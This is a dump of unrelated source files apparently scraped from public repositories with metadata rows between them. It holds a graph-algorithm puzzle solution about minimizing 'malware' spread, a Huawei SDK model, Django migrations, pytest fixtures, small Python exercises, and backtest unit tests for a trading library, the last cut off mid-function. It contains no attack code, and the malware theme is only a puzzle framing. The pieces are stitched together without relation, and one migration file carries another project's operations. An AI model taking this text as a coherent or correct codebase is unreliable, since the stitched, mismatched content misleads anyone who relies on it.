# Example 3:
#
#
# Input: graph = [[1,1,0,0],[1,1,1,0],[0,1,1,1],[0,0,1,1]], initial = [0,1]
# Output: 1
#
#
#
#
# Note:
#
#
# 1 < graph.length = graph[0].length <= 300
# 0 <= graph[i][j] == graph[j][i] <= 1
# graph[i][i] = 1
# 1 <= initial.length < graph.length
# 0 <= initial[i] < graph.length
#
#
#
#
#
class Solution:
    def minMalwareSpread(self, graph, initial):
        """
        Return the node from ``initial`` whose complete removal (with all of
        its edges) minimizes the final number of infected nodes, preferring
        the smallest index on ties.

        Approach: union-find over the *clean* (never initially infected)
        nodes only.  A clean component is saved by removing an initial node
        ``u`` exactly when ``u`` is the only initial node adjacent to it.

        :type graph: List[List[int]]  symmetric adjacency matrix (0/1)
        :type initial: List[int]      initially infected nodes
        :rtype: int
        """
        from collections import Counter, defaultdict

        n = len(graph)
        infected = set(initial)

        # Union-find restricted to clean nodes.
        parent = list(range(n))

        def find(x):
            # Path-halving find.
            while parent[x] != x:
                parent[x] = parent[parent[x]]
                x = parent[x]
            return x

        def union(a, b):
            ra, rb = find(a), find(b)
            if ra != rb:
                parent[ra] = rb

        for i in range(n):
            if i in infected:
                continue
            for j in range(i + 1, n):
                if j not in infected and graph[i][j]:
                    union(i, j)

        # Size of each clean component, keyed by its representative.
        comp_size = Counter(find(i) for i in range(n) if i not in infected)

        # Which initial nodes directly touch each clean component.
        sources = defaultdict(set)
        for u in initial:
            for v in range(n):
                if v not in infected and graph[u][v]:
                    sources[find(v)].add(u)

        # A component is saved only when a single initial node feeds it.
        saved = Counter()
        for root, srcs in sources.items():
            if len(srcs) == 1:
                saved[next(iter(srcs))] += comp_size[root]

        # Pick the max saved count; sorted() breaks ties by smallest index.
        best, best_saved = min(initial), -1
        for u in sorted(initial):
            if saved[u] > best_saved:
                best, best_saved = u, saved[u]
        return best
| [
"frankie.y.liu@gmail.com"
] | frankie.y.liu@gmail.com |
b6a5c2f15626edecf3ea8a6763bb009f676c390c | f63dc9959bbd596c04f70f671f9b0cbc70adb552 | /env/lib/python3.6/locale.py | 85ad85424ce8923f94bdd4a9e48f80c782c8e4d2 | [] | no_license | paulfranco/imd_api | efa4e5d5399fea191f215d2a8d907adfb55ab31a | 1889290b5596fd1a020c336cc7c28d8521785a15 | refs/heads/master | 2020-03-16T06:30:31.077649 | 2018-05-09T02:10:03 | 2018-05-09T02:10:03 | 132,556,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51 | py | /Users/paulfranco/anaconda3/lib/python3.6/locale.py | [
"paulfranco@me.com"
] | paulfranco@me.com |
cf18022549aef20a26f2714caf5b93d8f7efabc5 | af7df9d77a2545b54d8cd03e7f4633dce6125f4a | /ch01/dump_db_file.py | 08c49f7df3fa12cf40a63f58a162267690e31ca1 | [] | no_license | socrates77-sh/PP4E | 71e6522ea2e7cfd0c68c1e06ceb4d0716cc0f0bd | c92e69aea50262bfd63e95467ae4baf7cdc2f22f | refs/heads/master | 2020-05-29T08:46:47.380002 | 2018-11-16T10:38:44 | 2018-11-16T10:38:44 | 69,466,298 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 147 | py | # -*- coding: utf-8 -*-
from make_db_file import loadDbase
db=loadDbase()
for key in db:
print(key, '=>\n', db[key])
print(db['sue']['name'])
| [
"zhwenrong@sina.com"
] | zhwenrong@sina.com |
048e806cc70ff70663d75e5ce3c42d2c27bff113 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-organizations/huaweicloudsdkorganizations/v1/model/delete_policy_response.py | 88dddb590f321ee7c66d8f2afe81f37f6be70dba | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 2,431 | py | # coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DeletePolicyResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
}
attribute_map = {
}
def __init__(self):
"""DeletePolicyResponse
The model defined in huaweicloud sdk
"""
super(DeletePolicyResponse, self).__init__()
self.discriminator = None
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DeletePolicyResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
80904623674486b0b93747232379e3d88873ba80 | 8a73cde463081afd76427d5af1e6837bfa51cc47 | /harvester/core/migrations/0025_delete_old_resources.py | 77fb7080cd64397347c6dd06423d07ea64ccfdb9 | [
"MIT"
] | permissive | surfedushare/search-portal | 8af4103ec6464e255c5462c672b30f32cd70b4e1 | 63e30ad0399c193fcb686804062cedf3930a093c | refs/heads/acceptance | 2023-06-25T13:19:41.051801 | 2023-06-06T13:37:01 | 2023-06-06T13:37:01 | 254,373,874 | 2 | 1 | MIT | 2023-06-06T12:04:44 | 2020-04-09T13:07:12 | Python | UTF-8 | Python | false | false | 494 | py | # Generated by Django 3.2.8 on 2021-10-25 13:29
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0024_pdf_thumbnails'),
]
operations = [
migrations.RemoveField(
model_name='tikaresource',
name='retainer_type',
),
migrations.DeleteModel(
name='FileResource',
),
migrations.DeleteModel(
name='TikaResource',
),
]
| [
"email@fakoberkers.nl"
] | email@fakoberkers.nl |
69fd3114d948b6199a0cea0eb3d2011db1a66155 | 5eb52c07e5b1bd00af77306f927f382b684cd6ff | /indy_node/test/pool_config/conftest.py | d7be1101c2ac8cde5ad4580c819339cd86ec230f | [
"Apache-2.0"
] | permissive | hyperledger/indy-node | bce39486988f5114581cff4f6d14fc1b7684143c | e6bb87d4c605aff9914491d062248b6ec857334c | refs/heads/main | 2023-09-03T15:33:08.187153 | 2023-05-08T22:48:21 | 2023-05-08T22:48:21 | 77,021,566 | 691 | 783 | Apache-2.0 | 2023-05-09T15:42:43 | 2016-12-21T05:45:04 | Python | UTF-8 | Python | false | false | 812 | py | import pytest
from indy_node.test.pool_config.helper import sdk_ensure_pool_config_sent
def genPoolConfig(writes: bool, force: bool):
return dict(writes=writes, force=force)
@pytest.fixture(scope='module')
def poolConfigWTFF():
return genPoolConfig(writes=True, force=False)
@pytest.fixture(scope='module')
def poolConfigWFFF():
return genPoolConfig(writes=False, force=False)
@pytest.fixture(scope='module')
def poolConfigWTFT():
return genPoolConfig(writes=True, force=True)
@pytest.fixture(scope='module')
def poolConfigWFFT():
return genPoolConfig(writes=False, force=True)
@pytest.fixture(scope="module")
def poolConfigSent(looper, nodeSet, sdk_pool_handle, sdk_wallet_trustee, poolCfg):
sdk_ensure_pool_config_sent(looper, sdk_pool_handle, sdk_wallet_trustee, poolCfg)
| [
"alexander.sherbakov@dsr-company.com"
] | alexander.sherbakov@dsr-company.com |
6afe4beed95660164eed8effffbe691f3fba898e | fca336a7d3ac6e314179f47f72a33021eb9fcde2 | /python/20.py | b696b6cc527a3ba4eceb7c5cc26c3ac15db08d8a | [] | no_license | iamFIREcracker/project-euler | e84adfdcdcf2859f9fd2e57670110f5a7022f074 | 5dc50d9b1b41761b95e14a49e3ab9a80e4498657 | refs/heads/master | 2021-07-11T11:44:38.453475 | 2017-10-15T16:36:05 | 2017-10-15T16:36:05 | 107,029,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 192 | py | """Find the sum of the digits in the number 100!
"""
import operator
print sum([int(c) for c in str(reduce(operator.mul,
[i for i in xrange(1, 101)]))])
| [
"matteo@matteolandi.net"
] | matteo@matteolandi.net |
2579e7e3a224013905d329e650e5d7ad7f25e4a0 | 2a54e8d6ed124c64abb9e075cc5524bb859ba0fa | /.history/1-Python-Basics/30-sets2_20200413205952.py | d79689b34bec2e0cad9ed29fe12bf8d7724c6d0d | [] | no_license | CaptainStorm21/Python-Foundation | 01b5fbaf7a913506518cf22e0339dd948e65cea1 | a385adeda74f43dd7fb2d99d326b0be23db25024 | refs/heads/master | 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 82 | py | # methods
my_set = { 1, 2, 3, 9, 10, 9}
your_set = [342,23,42,46,]
print(my_set)
| [
"tikana4@yahoo.com"
] | tikana4@yahoo.com |
7acbe3493e0d99d206cc053bfb28dc20de9e95a1 | bd435e3ff491d13c3cb1ffcf34771ac1c80f7859 | /code/base/test_module/package_runoob/runoob2.py | da3d36dcd4aa2bbe0c5d9f8242d047c8328d4dc4 | [] | no_license | luningcowboy/PythonTutorial | 8f4b6d16e0fad99a226540a6f12639ccdff402ff | 9024efe8ed22aca0a1271a2c1c388d3ffe1e6690 | refs/heads/master | 2021-06-16T23:03:22.153473 | 2020-04-09T13:52:12 | 2020-04-09T13:52:12 | 187,571,993 | 0 | 0 | null | 2021-03-25T23:02:36 | 2019-05-20T05:16:13 | Python | UTF-8 | Python | false | false | 35 | py | def runoob2():
print "runoob2"
| [
"luningcowboy@gmail.com"
] | luningcowboy@gmail.com |
863686b0bee3264e4df7e5fe6bc35b5bb19fd291 | c1655d6c6c11dafc1c7fa9f771b8e1f99cf7f123 | /venv/bin/results_schema | 15b83f64b98111511e0829dfbe16906db2994430 | [] | no_license | igorsowa9/vpp | a27520f19a54d7490534016ded9cd66f4ef5385b | ea91e3b2db921e7b1a450d243f39dbcf61231107 | refs/heads/master | 2021-04-30T03:28:56.642244 | 2019-09-16T09:01:49 | 2019-09-16T09:01:49 | 121,514,524 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 276 | #!/home/iso/PycharmProjects/vpp/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pyomo.scripting.commands import results_schema
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(results_schema())
| [
"iso@ubuntu.ubuntu-domain"
] | iso@ubuntu.ubuntu-domain | |
0010ddf6c6cc7080f556ea0f9f88f801902a9897 | 11d75881f729dc5e9ca08bfe6adae0fd64098056 | /dazzler/system/__init__.py | 13121628e6b1dffbb55124890f3bf3201073901a | [
"MIT"
] | permissive | jbampton/dazzler | b918723c4fd1f0015153247345156007581b0520 | 4018f6cbcb55a9f482cb5c5cbf6a06b063c15e21 | refs/heads/master | 2023-03-08T12:18:13.847188 | 2021-06-19T22:29:54 | 2021-06-20T13:23:18 | 218,608,116 | 1 | 0 | MIT | 2023-03-06T19:00:08 | 2019-10-30T19:38:15 | Python | UTF-8 | Python | false | false | 1,337 | py | """
Dazzler systems (API)
- Requirements are JS/CSS resources to include on rendering.
- Packages hold components info and it's requirements.
- Component Aspects are shared between backend and frontend with bindings.
- Generate components with ``dazzler generate metadata.json output_dir``
- Page holds meta data for rendering, requirements, routes, layout, bindings.
"""
from ._component import Component, Aspect # noqa: F401
from ._binding import * # noqa: F401, F403
from ._package import Package # noqa: F401
from ._requirements import ( # noqa: F401
Requirement,
RequirementWarning,
assets_to_requirements,
collect_requirements,
)
from ._generator import generate_components, generate_meta # noqa: F401
from ._undefined import UNDEFINED, Undefined # noqa: F401
from ._page import Page # noqa: F401
from ._middleware import Middleware # noqa: F401
from ._route import Route, RouteMethod # noqa: F401
# Explicit public API of the package.  The binding-related names
# (BindingContext, Binding, Trigger, State, BoundAspect) are re-exported
# through the star import from ._binding, hence the F405 suppression.
__all__ = [  # noqa: F405
    'Component',
    'Aspect',
    'BindingContext',
    'Binding',
    'Trigger',
    'State',
    'BoundAspect',
    'Package',
    'Requirement',
    'RequirementWarning',
    'assets_to_requirements',
    'collect_requirements',
    'generate_components',
    'generate_meta',
    'UNDEFINED',
    'Undefined',
    'Page',
    'Middleware',
    'Route',
    'RouteMethod',
]
| [
"t4rk@outlook.com"
] | t4rk@outlook.com |
4e9c8e1528a41a397fcd5edc6922892c841935c6 | 37d2a09c274ce31f1e6f690c234c3447d4708d6a | /staicoin/cmds/units.py | d30bcc831278333eb79b7ac1af62fb23f2833875 | [
"Apache-2.0"
] | permissive | jzblanco/staicoin-blockchain | 60aedc566f475922e845ea019f2d8468f510a947 | 75a148429f6d39c36802c83b928ad8effbfc56a8 | refs/heads/main | 2023-08-17T13:11:46.094703 | 2021-10-08T23:13:49 | 2021-10-08T23:13:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | from typing import Dict
# The rest of the codebase uses mojos everywhere.
# Only use these units for user facing interfaces.
units: Dict[str, int] = {
"staicoin": 10 ** 9, # 1 staicoin (stai) is 1,000,000,000 mojo (1 billion)
"mojo:": 1,
"colouredcoin": 10 ** 3, # 1 coloured coin is 1000 colouredcoin mojos
}
| [
"em@iguru.team"
] | em@iguru.team |
77bd0747f7d7fc145ab0b45eefafd6f638002f18 | 72ec201effe17c3875f3d26ab98d6e56f808b0ac | /aoomuki_comp/app/migrations/0047_auto_20210202_1646.py | ad2ed545f6323c217246556f94f308312325f1d1 | [
"MIT"
] | permissive | Kamelgasmi/aoomuki_competences | 549f9c9167f82d084ef6048cec72e87fe90f4c35 | e02f3546f7efb54b825dbcfab968296607775903 | refs/heads/master | 2023-04-06T17:48:35.921460 | 2021-04-16T08:49:15 | 2021-04-16T08:49:15 | 330,929,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | # Generated by Django 3.1.5 on 2021-02-02 15:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Removes the obsolete TikaResource/FileResource models: first drops the
    # TikaResource.retainer_type column so the model can be deleted cleanly,
    # then deletes both model tables.

    dependencies = [
        ('core', '0024_pdf_thumbnails'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='tikaresource',
            name='retainer_type',
        ),
        migrations.DeleteModel(
            name='FileResource',
        ),
        migrations.DeleteModel(
            name='TikaResource',
        ),
    ]
| [
"kam_7@hotmail.fr"
] | kam_7@hotmail.fr |
dfd731d95d35d7ba3ca64ab77bed8a8cf155b40b | 950884cea2a67bc2047c8a7c278d1cbf7f657b29 | /submits.2015/14_57_48_33_1_8767.py | ce10341e2c19add871a9204b5ab9e64b55c845fd | [] | no_license | lisiynos/loo2015 | ac5bd8d1d81c301be0e65960c3707506120f0b7f | cf3d12589c9e586921c2a38554103fc1c7652abe | refs/heads/master | 2020-12-25T17:35:50.917577 | 2016-08-29T09:31:40 | 2016-08-29T09:31:40 | 29,869,192 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | with open('hall.in', 'r') as infile:
a, b, c, d = [int(x) for x in infile.readline().split()]
hall_counter = 0
for x in range(1, b + 1):
for y in range(1, b + 1):
if c <= (x + y) * 2 <= d and a <= x * y <= b:
hall_counter += 1
hall_counter = str(int((hall_counter + 1)/2))
with open('hall.out', 'w') as outfile:
outfile.write(hall_counter) | [
"super.denis@gmail.com"
] | super.denis@gmail.com |
dbf7e015cf51dbbb14357fd117a4ad9c60957475 | 0202dff1bcf4d49195fbcd0656ee79f93115a7b9 | /tests/test_slippage.py | 00a82eb1222a53b25289a3fb564e29b77ae795b7 | [
"Apache-2.0"
] | permissive | TimPchelintsev/moonshot | f9637889753609c966a3320f89fd7585693d82fa | 08374bdb4fb24ec8c4c196aeed2b2bf757acffb3 | refs/heads/master | 2020-04-13T15:29:46.601080 | 2018-11-08T15:13:02 | 2018-11-08T15:13:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,475 | py | # Copyright 2018 QuantRocket LLC - All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# To run: python3 -m unittest discover -s tests/ -p test_*.py -t . -v
import os
import unittest
from unittest.mock import patch
import glob
import pandas as pd
from moonshot import Moonshot
from moonshot.slippage import FixedSlippage
from moonshot.cache import TMP_DIR
class MoonshotSlippgeTestCase(unittest.TestCase):
"""
Test cases related to applying slippage in a backtest.
"""
def tearDown(self):
"""
Remove cached files.
"""
for file in glob.glob("{0}/moonshot*.pkl".format(TMP_DIR)):
os.remove(file)
    def test_no_slippage(self):
        """
        Tests that the resulting DataFrames are correct when no slippage is
        applied: the Slippage field is all zeros and returns are pure price
        moves weighted by exposure.
        """
        class BuyBelow10ShortAbove10(Moonshot):
            """
            A basic test strategy that buys below 10 and shorts above 10.
            """

            def prices_to_signals(self, prices):
                # Long (+1) when Close <= 10, short (-1) when Close > 10.
                long_signals = prices.loc["Close"] <= 10
                short_signals = prices.loc["Close"] > 10
                signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
                return signals

        def mock_get_historical_prices(*args, **kwargs):
            # Two conids (12345, 23456) over four sessions; Close and Volume
            # are stacked into a (Field, Date) MultiIndex as the real data
            # layer would return them.
            dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
            fields = ["Close","Volume"]
            idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])

            prices = pd.DataFrame(
                {
                    12345: [
                        # Close
                        9,
                        11,
                        10.50,
                        9.99,
                        # Volume
                        5000,
                        16000,
                        8800,
                        9900
                    ],
                    23456: [
                        # Close
                        9.89,
                        11,
                        8.50,
                        10.50,
                        # Volume
                        15000,
                        14000,
                        28800,
                        17000
                    ],
                },
                index=idx
            )

            # Minimal securities master (just the Timezone field) appended
            # below the price fields, as the strategy expects.
            master_fields = ["Timezone"]
            idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
            securities = pd.DataFrame(
                {
                    12345: [
                        "America/New_York"
                    ],
                    23456: [
                        "America/New_York"
                    ]
                },
                index=idx
            )
            return pd.concat((prices, securities))

        with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
            results = BuyBelow10ShortAbove10().backtest()

        self.assertSetEqual(
            set(results.index.get_level_values("Field")),
            {'Commission',
             'AbsExposure',
             'Signal',
             'Return',
             'Slippage',
             'NetExposure',
             'Trade',
             'AbsWeight',
             'Weight'}
        )

        # Round for stable comparison, and replace NaN (which never compares
        # equal to itself) with a "nan" sentinel so dicts can be compared.
        results = results.round(7)
        results = results.where(results.notnull(), "nan")

        signals = results.loc["Signal"].reset_index()
        signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            signals.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [1.0,
                     -1.0,
                     -1.0,
                     1.0],
             23456: [1.0,
                     -1.0,
                     1.0,
                     -1.0]}
        )

        # Equal-weighting across two securities gives +/-0.5 per conid.
        weights = results.loc["Weight"].reset_index()
        weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            weights.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.5,
                     -0.5,
                     -0.5,
                     0.5],
             23456: [0.5,
                     -0.5,
                     0.5,
                     -0.5]}
        )

        # Exposures are the prior day's weights (positions entered next day).
        net_exposures = results.loc["NetExposure"].reset_index()
        net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            net_exposures.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -0.5,
                     -0.5],
             23456: ["nan",
                     0.5,
                     -0.5,
                     0.5]}
        )

        # Trades are the day-over-day change in net exposure.
        trades = results.loc["Trade"].reset_index()
        trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            trades.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -1.0,
                     0.0],
             23456: ["nan",
                     0.5,
                     -1.0,
                     1.0]}
        )

        # No slippage class or SLIPPAGE_BPS configured: Slippage is all zero.
        slippage = results.loc["Slippage"].reset_index()
        slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            slippage.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     0.0,
                     0.0,
                     0.0],
             23456: [0.0,
                     0.0,
                     0.0,
                     0.0]}
        )

        # Returns are price change times prior exposure, with no slippage
        # deducted (per-period calculations shown inline).
        returns = results.loc["Return"]
        returns = returns.reset_index()
        returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            returns.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     0.0,
                     -0.0227273, # (10.50 - 11)/11 * 0.5
                     0.0242857], # (9.99 - 10.50)/10.50 * -0.5
             23456: [0.0,
                     0.0,
                     -0.1136364, # (8.50 - 11)/11 * 0.5
                     -0.1176471] # (10.50 - 8.50)/8.50 * -0.5
             }
        )
    def test_apply_slippage(self):
        """
        Tests that the resulting DataFrames are correct when a single
        slippage class is applied: 10 bps per side is charged on each
        change in exposure and deducted from returns.
        """
        class TestSlippage(FixedSlippage):

            ONE_WAY_SLIPPAGE = 0.001 # 10 BPS

        class BuyBelow10ShortAbove10(Moonshot):
            """
            A basic test strategy that buys below 10 and shorts above 10.
            """
            SLIPPAGE_CLASSES = TestSlippage

            def prices_to_signals(self, prices):
                # Long (+1) when Close <= 10, short (-1) when Close > 10.
                long_signals = prices.loc["Close"] <= 10
                short_signals = prices.loc["Close"] > 10
                signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
                return signals

        def mock_get_historical_prices(*args, **kwargs):
            # Same two-conid, four-session fixture used by the no-slippage
            # test, so only the slippage deduction differs.
            dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
            fields = ["Close","Volume"]
            idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])

            prices = pd.DataFrame(
                {
                    12345: [
                        # Close
                        9,
                        11,
                        10.50,
                        9.99,
                        # Volume
                        5000,
                        16000,
                        8800,
                        9900
                    ],
                    23456: [
                        # Close
                        9.89,
                        11,
                        8.50,
                        10.50,
                        # Volume
                        15000,
                        14000,
                        28800,
                        17000
                    ],
                },
                index=idx
            )

            master_fields = ["Timezone"]
            idx = pd.MultiIndex.from_product((master_fields, [dt_idx[0]]), names=["Field", "Date"])
            securities = pd.DataFrame(
                {
                    12345: [
                        "America/New_York"
                    ],
                    23456: [
                        "America/New_York"
                    ]
                },
                index=idx
            )
            return pd.concat((prices, securities))

        with patch("moonshot.strategies.base.get_historical_prices", new=mock_get_historical_prices):
            results = BuyBelow10ShortAbove10().backtest()

        self.assertSetEqual(
            set(results.index.get_level_values("Field")),
            {'Commission',
             'AbsExposure',
             'Signal',
             'Return',
             'Slippage',
             'NetExposure',
             'Trade',
             'AbsWeight',
             'Weight'}
        )

        # Round for stable comparison and replace NaN with a sentinel string.
        results = results.round(7)
        results = results.where(results.notnull(), "nan")

        signals = results.loc["Signal"].reset_index()
        signals.loc[:, "Date"] = signals.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            signals.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [1.0,
                     -1.0,
                     -1.0,
                     1.0],
             23456: [1.0,
                     -1.0,
                     1.0,
                     -1.0]}
        )

        weights = results.loc["Weight"].reset_index()
        weights.loc[:, "Date"] = weights.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            weights.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.5,
                     -0.5,
                     -0.5,
                     0.5],
             23456: [0.5,
                     -0.5,
                     0.5,
                     -0.5]}
        )

        net_exposures = results.loc["NetExposure"].reset_index()
        net_exposures.loc[:, "Date"] = net_exposures.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            net_exposures.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -0.5,
                     -0.5],
             23456: ["nan",
                     0.5,
                     -0.5,
                     0.5]}
        )

        trades = results.loc["Trade"].reset_index()
        trades.loc[:, "Date"] = trades.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            trades.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: ["nan",
                     0.5,
                     -1.0,
                     0.0],
             23456: ["nan",
                     0.5,
                     -1.0,
                     1.0]}
        )

        # Slippage = ONE_WAY_SLIPPAGE (0.001) * abs(trade): e.g. a 0.5
        # trade costs 0.0005, a full reversal of 1.0 costs 0.001.
        slippage = results.loc["Slippage"].reset_index()
        slippage.loc[:, "Date"] = slippage.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            slippage.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     0.0005,
                     0.001,
                     0.0],
             23456: [0.0,
                     0.0005,
                     0.001,
                     0.001]}
        )

        # Returns are price change times prior exposure, minus the slippage
        # charged that period (calculations shown inline).
        returns = results.loc["Return"]
        returns = returns.reset_index()
        returns.loc[:, "Date"] = returns.Date.dt.strftime("%Y-%m-%dT%H:%M:%S%z")
        self.assertDictEqual(
            returns.to_dict(orient="list"),
            {'Date': [
                '2018-05-01T00:00:00',
                '2018-05-02T00:00:00',
                '2018-05-03T00:00:00',
                '2018-05-04T00:00:00'],
             12345: [0.0,
                     -0.0005,
                     -0.0237273, # (10.50 - 11)/11 * 0.5 - 0.001
                     0.0242857], # (9.99 - 10.50)/10.50 * -0.5
             23456: [0.0,
                     -0.0005,
                     -0.1146364, # (8.50 - 11)/11 * 0.5 - 0.001
                     -0.1186471] # (10.50 - 8.50)/8.50 * -0.5 - 0.001
             }
        )
    def test_apply_SLIPPAGE_BPS(self):
        """
        Tests that the resulting DataFrames are correct when SLIPPAGE_BPS is
        applied: 20 bps per side is charged on each change in exposure and
        deducted from returns.
        """
        class BuyBelow10ShortAbove10(Moonshot):
            """
            A basic test strategy that buys below 10 and shorts above 10.
            """
            SLIPPAGE_BPS = 20

            def prices_to_signals(self, prices):
                # Long (+1) when Close <= 10, short (-1) when Close > 10.
                long_signals = prices.loc["Close"] <= 10
                short_signals = prices.loc["Close"] > 10
                signals = long_signals.astype(int).where(long_signals, -short_signals.astype(int))
                return signals

        def mock_get_historical_prices(*args, **kwargs):
            # Same two-conid, four-session fixture used by the other
            # slippage tests, so only the slippage deduction differs.
            dt_idx = pd.DatetimeIndex(["2018-05-01","2018-05-02","2018-05-03", "2018-05-04"])
            fields = ["Close","Volume"]
            idx = pd.MultiIndex.from_product([fields, dt_idx], names=["Field", "Date"])

            prices = pd.DataFrame(
                {
                    12345: [
                        # Close
                        9,
                        11,
                        10.50,
                        9.99,
                        # Volume
                        5000,
                        16000,
                        8800,
                        9900
                    ],
                    23456: [
                        # Close
                        9.89,
                        11,
                        8.50,
                        10.50,
                        # Volume
                        15000,
                        14000,
                        28800,
                        17000
                    ],
                },
                index=idx
            )

